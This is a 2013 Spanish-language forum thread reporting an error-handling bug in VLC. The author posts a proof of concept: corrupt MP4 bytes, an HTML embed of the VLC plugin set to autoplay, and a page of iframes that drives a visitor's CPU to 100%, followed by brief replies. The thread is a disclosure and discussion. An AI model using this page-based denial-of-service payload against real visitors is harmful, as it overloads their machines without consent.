Foro de elhacker.net

Seguridad Informática => Bugs y Exploits => Mensaje iniciado por: Stakewinner00 en 22 Agosto 2013, 20:33 pm


Título: Bug VLC en el manejo de errores
Publicado por: Stakewinner00 en 22 Agosto 2013, 20:33 pm
Buenas, hace poco me di cuenta de que VLC no maneja bien los errores produciendo un bucle infinito que sobrecarga la CPU. Lo peor es que esto ocurre también cuando cargas un video de VLC por html sobrecargando la CPU de el que la visite hasta el 100%.

No se si esto es realmente un fallo de seguridad o no o si es grave o no y por eso busco la opinión de terceras personas.

Paso a explicar rápidamente la POC que hice para probar si a la gente también se le colapsaba la CPU al visitar la web.

Primero cree un archivo mp4 corrupto que edite con el siguiente contenido inválido
Citar
AAAAAAAAA☺↨↓4♦AAAAAAAAAA☺↨↓4♦AAAAAAAAAA☺↨↓4♦AAAAAAAAAA☺↨↓4♦AAAAAAAAAA☺↨↓

Luego cree un archivo html que cargaba dicho vieo
Código:
<embed type="application/x-vlc-plugin" pluginspage="http://www.videolan.org" version="VideoLAN.VLCPlugin.2"  width="100%"  height="100%" id="vlc" loop="yes" autoplay="yes" target="a.mp4"></embed>
Una vez echo esto cree otro html que colocaba unos 4 iframes del archivo anterior
Código:
<iframe src="a.html"></iframe> <iframe src="a.html"></iframe> <iframe src="a.html"></iframe> <iframe src="a.html"></iframe>

Y el resultado fue el siguiente

(http://i41.tinypic.com/2a94851.png)

Resulta algo penoso que un programa como VLC falle en el manejo de errores.

Saludos, espero sus opiniones.



Título: Re: Bug VLC en el manejo de errores
Publicado por: berz3k en 1 Septiembre 2013, 00:38 am
Que version del VLC estas asuando?

-berz3k.

Título: Re: Bug VLC en el manejo de errores
Publicado por: Stakewinner00 en 1 Septiembre 2013, 11:09 am
Cita de: berz3k en  1 Septiembre 2013, 00:38 am
Que version del VLC estas asuando?

-berz3k.

La más actualizada.

Título: Re: Bug VLC en el manejo de errores
Publicado por: ameise_1987 en 1 Septiembre 2013, 19:37 pm
el más actualizado segun los repositorios de debian weezy (?)


http://blog.scrt.ch/2013/07/24/vlc-abc-parsing-seems-to-be-a-ctf-challenge/

Título: Re: Bug VLC en el manejo de errores
Publicado por: Stakewinner00 en 1 Septiembre 2013, 21:56 pm
Cita de: ameise_1987 en  1 Septiembre 2013, 19:37 pm
el más actualizado segun los repositorios de debian weezy (?)


http://blog.scrt.ch/2013/07/24/vlc-abc-parsing-seems-to-be-a-ctf-challenge/

Que interesante.
Gracias por compartir.

Título: Re: Bug VLC en el manejo de errores
Publicado por: cachacko en 4 Septiembre 2013, 03:17 am



¿Qué tan grave es el bug?



(http://www.freeimagehost.info/files/img/user_uploads/displayimage.php?id=b0rbeo79sa83945925.gif)


Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines